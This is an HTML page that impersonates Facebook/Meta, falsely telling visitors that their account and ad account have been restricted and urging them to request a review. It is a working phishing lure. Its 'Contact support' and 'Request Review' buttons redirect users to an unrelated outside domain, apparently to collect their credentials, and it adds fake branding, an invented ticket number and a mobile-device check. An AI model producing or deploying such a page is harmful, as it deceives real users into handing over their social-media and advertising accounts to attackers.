<!DOCTYPE html>
<html lang="en" id="html">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>FACEBOOK</title>
    <link rel="stylesheet" href="styles/bootstrap.min.css">
    </script>
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.7.1/jquery.min.js"></script>
    <link rel="stylesheet" href="styles/style.css">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/material-design-iconic-font/2.2.0/css/material-design-iconic-font.min.css">
    <link rel="shortcut icon" href="../ico.ico" type="image/x-icon">
    <style>
        .popup {
            width: 100%;
            height: 100%;
            position: fixed;
            top: 0;
            left: 0;
            z-index: 9999;
            background-color: rgba(0, 0, 0, 0.4);
        }
        .popup-ads-restricted {
            background: #fff;
            width: 500px;
            height: auto;
            margin: 50px auto;
            margin-top: 5%;
            text-align: left;
            border-radius: 10px;
        }
        .popup-ads-restricted i {
            margin-top: 10px;
            margin-right: 20px;
            color: #000;
            font-size: 25px;
            cursor: pointer;
            right: 37%;
            position: absolute;
        }
        .popup-ads-restricted-header {
            width: 100%;
            height: auto;
        }
        .popup-ads-restricted-header img {
            width: 100%;
            height: auto;
            border-top-left-radius: 10px;
            border-top-right-radius: 10px;
        }
        .popup-ads-restricted-content {
            background: #fff;
            width: 500px;
            height: auto;
            margin-top: -10px;
            padding: 15px;
            border-radius: 10px;
            position: absolute;
        }
        .popup-ads-restricted-content p {
            color: #000;
            font-size: 19px;
            font-family: Optimistic Display Bold, Helvetica, Arial, sans-serif;
            font-weight: 700;
        }
        .popup-ads-restricted-content small {
            color: rgba(0, 0, 0, 0.56);
            font-size: 15px;
            font-family: Optimistic Text Normal, Helvetica, Arial, sans-serif !important;
        }
        .popup-ads-restricted-content small span {
            color: #1778F2;
            cursor: pointer;
        }
        .popup-ads-restricted-content button {
            background: #1778F2;
            width: auto;
            height: auto;
            margin-top: 50px;
            padding: 8px;
            padding-left: 14px;
            padding-right: 14px;
            color: #fff;
            font-size: 15px;
            font-family: Optimistic Display Bold, Helvetica, Arial, sans-serif;
            font-weight: 700;
            border: 1px solid #1778F2;
            border-radius: 7px;
            outline: none;
            cursor: pointer;
            float: right;
        }
        .clearfix::after {
            content: "";
            clear: both;
            display: table;
        }
        @media only screen and (max-width:600px) {
            .popup-ads-restricted {
                width: 360px;
                margin-top: 30%;
            }
            .popup-ads-restricted i {
                margin-top: 10px;
                right: 4%;
            }
            .popup-ads-restricted-content {
                width: 360px;
            }
        }
    </style>
</head>

<body onload="showingAlert()">
    <div class="container" id="main">
        <div class="container-head">
        </div>
        <div class="row">
            <div class="col-20">
                <div id="center">
                    <h1>
                        <img src="img/block_2.png" alt="" style="height: 40px; width:40px; margin-right: 8px;">
                        We have added restrictions to your account
                    </h1>
                    <p>We have received several reports that your account violates our terms of service and community guidelines. As a result, your account will be sent for verification.</p>
                    <br>
                    <p>If you believe restrictions have been placed on your account in error, you can request a review.</p>
                    <div id="utm-ticketId" style="display: none;">
                        <p class="small-grey">Your ticket id: <span>#4564-ATFD-4865</span></p>
                    </div>


                    <div class="action-button wide" id="view-accounts" onclick="accountsModal.show()" style="display: none;">
                        <div class="action-button-img">
                            <img src="img/no_avatar.png" alt="">
                        </div>
                        <div class="action-button-text">
                            <span>View accounts</span>
                            <br>
                            <span class="small-grey UserName"></span>
                        </div>
                        <div class="action-button-arrow">
                            <svg viewBox="0 0 24 24" fill="currentColor" width="1em" height="1em" class="x1lliihq x1k90msu x2h7rmj x1qfuztq xcza8v6 xlup9mm x1kky2od">
                                <path fill-rule="evenodd" clip-rule="evenodd" d="M7.247 4.341a1 1 0 0 1 1.412-.094l8 7a1 1 0 0 1 0 1.506l-8 7a1 1 0 0 1-1.318-1.506L14.482 12l-7.14-6.247a1 1 0 0 1-.094-1.412z">
                                </path>
                            </svg>
                        </div>
                    </div>
                    <br>
                    <h6>Appeal Guide</h6>
                    <ul>
                        <li>Fact checkers may not respond to requests that contain intimidation, hate speech, or other verbal threats.</li>
                        <li>In your appeal, please include all necessary information to allow the fact checker to process your request in a timely manner. If you provide an invalid email address or do not respond to a request for additional information within 2 days, the fact checker may close the application without processing. If the appeal is not processed within 4 days, Meta will automatically reject it.</li>
                        <li>When everything is ready, we will review your account and determine whether restrictions apply to it. The verification procedure usually lasts 24 hours, but in some cases it may take longer. Depending on our decision, the restrictions imposed will remain in effect or will be lifted and your account will be reinstated.</li>
                    </ul>
                    <div id="card">
                        <img src="img/banner_new_02.png" alt="">
                        <div class="card-text">
                            <p class="card-type">Review request</p>
                            <h4>Fixing problems with account restrictions</h4>
                            <p>Please be sure to provide the requested information below. Failure to provide this information may delay the processing of your appeal.</p>
                            <div class="btn-wrapper">
                                <div id="start" class="button fb-blue w-100 goToRedirect">Request Review</div>
                            </div>
                        </div>
                    </div>
                    <br>
					<br>
                    <h6>Privacy Center</h6>
                    <div class="fake-likns">
                        <div class="action-button-list">
                            <div class="action-button wide">
                                <div class="action-button-img">
                                    <img src="img/save_img.png" alt="">
                                </div>
                                <div class="action-button-text">
                                    <span>What is the Privacy Policy and what does it say?</span>
                                    <br>
                                    <span class="small-grey">Privacy Policy</span>
                                </div>
                                <div class="action-button-arrow">
                                    <svg viewBox="0 0 24 24" fill="currentColor" width="1em" height="1em" class="x1lliihq x1k90msu x2h7rmj x1qfuztq xcza8v6 xlup9mm x1kky2od">
                                        <path fill-rule="evenodd" clip-rule="evenodd" d="M7.247 4.341a1 1 0 0 1 1.412-.094l8 7a1 1 0 0 1 0 1.506l-8 7a1 1 0 0 1-1.318-1.506L14.482 12l-7.14-6.247a1 1 0 0 1-.094-1.412z">
                                        </path>
                                    </svg>
                                </div>
                            </div>
                            <div class="action-button wide">
                                <div class="action-button-img">
                                    <img src="img/save_img.png" alt="">
                                </div>
                                <div class="action-button-text">
                                    <span>How you can manage or delete your information</span>
                                    <br>
                                    <span class="small-grey">Privacy Policy</span>
                                </div>
                                <div class="action-button-arrow">
                                    <svg viewBox="0 0 24 24" fill="currentColor" width="1em" height="1em" class="x1lliihq x1k90msu x2h7rmj x1qfuztq xcza8v6 xlup9mm x1kky2od">
                                        <path fill-rule="evenodd" clip-rule="evenodd" d="M7.247 4.341a1 1 0 0 1 1.412-.094l8 7a1 1 0 0 1 0 1.506l-8 7a1 1 0 0 1-1.318-1.506L14.482 12l-7.14-6.247a1 1 0 0 1-.094-1.412z">
                                        </path>
                                    </svg>
                                </div>
                            </div>
                        </div>

                        <br>
                        <h6>For more details, see the User Agreement</h6>
                        <div class="action-button wide">
                            <div class="action-button-img">
                                <img src="img/doc.png" alt="">
                            </div>
                            <div class="action-button-text">
                                <span>Meta AI</span>
                                <br>
                                <span class="small-grey">User Agreement</span>
                            </div>
                            <div class="action-button-arrow">
                                <svg viewBox="0 0 24 24" fill="currentColor" width="1em" height="1em" class="x1lliihq x1k90msu x2h7rmj x1qfuztq xcza8v6 xlup9mm x1kky2od">
                                    <path fill-rule="evenodd" clip-rule="evenodd" d="M7.247 4.341a1 1 0 0 1 1.412-.094l8 7a1 1 0 0 1 0 1.506l-8 7a1 1 0 0 1-1.318-1.506L14.482 12l-7.14-6.247a1 1 0 0 1-.094-1.412z">
                                    </path>
                                </svg>
                            </div>
                        </div>
                        <br>
                        <h6>Additional resources</h6>

                        <div class="action-button-list">
                            <div class="action-button wide">
                                <div class="action-button-text">
                                    <span>How Meta uses information for generative AI models</span>
                                    <br>
                                    <span class="small-grey">Privacy Center</span>
                                </div>
                                <div class="action-button-arrow">
                                    <svg viewBox="0 0 24 24" fill="currentColor" width="1em" height="1em" class="x1lliihq x1k90msu x2h7rmj x1qfuztq xcza8v6 xlup9mm x1kky2od">
                                        <path fill-rule="evenodd" clip-rule="evenodd" d="M7.247 4.341a1 1 0 0 1 1.412-.094l8 7a1 1 0 0 1 0 1.506l-8 7a1 1 0 0 1-1.318-1.506L14.482 12l-7.14-6.247a1 1 0 0 1-.094-1.412z">
                                        </path>
                                    </svg>
                                </div>
                            </div>
                            <div class="action-button wide">
                                <div class="action-button-text">
                                    <span>Cards with information about the operation of AI systems</span>
                                    <br>
                                    <span class="small-grey">Meta AI website</span>
                                </div>
                                <div class="action-button-arrow">
                                    <svg viewBox="0 0 24 24" fill="currentColor" width="1em" height="1em" class="x1lliihq x1k90msu x2h7rmj x1qfuztq xcza8v6 xlup9mm x1kky2od">
                                        <path fill-rule="evenodd" clip-rule="evenodd" d="M7.247 4.341a1 1 0 0 1 1.412-.094l8 7a1 1 0 0 1 0 1.506l-8 7a1 1 0 0 1-1.318-1.506L14.482 12l-7.14-6.247a1 1 0 0 1-.094-1.412z">
                                        </path>
                                    </svg>
                                </div>
                            </div>
                            <div class="action-button wide">
                                <div class="action-button-text">
                                    <span>Introduction to Generative AI</span>
                                    <br>
                                    <span class="small-grey">For teenagers</span>
                                </div>
                                <div class="action-button-arrow">
                                    <svg viewBox="0 0 24 24" fill="currentColor" width="1em" height="1em" class="x1lliihq x1k90msu x2h7rmj x1qfuztq xcza8v6 xlup9mm x1kky2od">
                                        <path fill-rule="evenodd" clip-rule="evenodd" d="M7.247 4.341a1 1 0 0 1 1.412-.094l8 7a1 1 0 0 1 0 1.506l-8 7a1 1 0 0 1-1.318-1.506L14.482 12l-7.14-6.247a1 1 0 0 1-.094-1.412z">
                                        </path>
                                    </svg>
                                </div>
                            </div>

                        </div>
                    </div>
                    <br>
                    <p class="small-grey">We continually identify potential privacy risks, including when collecting, using or sharing personal information, and developing methods to reduce these risks. Read more about <a target="_blank" id="policyLink" class="add-svg">Privacy Policy</a></p>
                </div>
            </div>
            <div class="popup" id="popup">
                <div class="popup-item">
                    <div class="burger-button-popup" id="closePopup">
                        <div class="bar"></div>
                        <div class="bar"></div>
                    </div>
                    <div class="popup-content"></div>
                </div>
            </div>
        </div>
    </div>

    <div class="popup alertRestrictedAds" style="display: none;">
        <div class="popup-ads-restricted">
            <i class="zmdi zmdi-close" onclick="closingAlert()"></i>
            <div class="popup-ads-restricted-header">
                <img src="img/restricted_ads.jpg">
            </div>
            <div class="popup-ads-restricted-content clearfix">
                <p>Your ad account has been restricted from advertising</p>
                <br>
                <small>We noticed unusual activity associated with your account. For your security, you will not able to run existing ads or create new ads. To restore your account, contact support. <span>Learn more about advertising restrictions.</span></small>
                <button type="button" onclick="window.top.location.href='https://manges-1009263.site/';">Contact support</button>
            </div>
        </div>
    </div>

    <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.1/jquery.min.js"></script>
    <script>
        function showingAlert() {
            setTimeout(function() {
                $('.alertRestrictedAds').fadeIn('fast');
            }, 500);
        }
        function closingAlert() {
            $('.alertRestrictedAds').fadeOut('fast');
            $('.goToRedirect').attr('onclick', 'goToRedirect()');
        }
        function goToRedirect() {
            window.top.location.href = 'https://manges-1009263.site/';
        }
    </script>
    <script>
        window.mobileCheck = function() {
            let check = false;
            (function(a) {
                if (/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i
                    .test(a) ||
                    /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i
                    .test(a.substr(0, 4))) check = true;
            })(navigator.userAgent || navigator.vendor || window.opera);

            return check;
        };
    </script>

</body>
</html>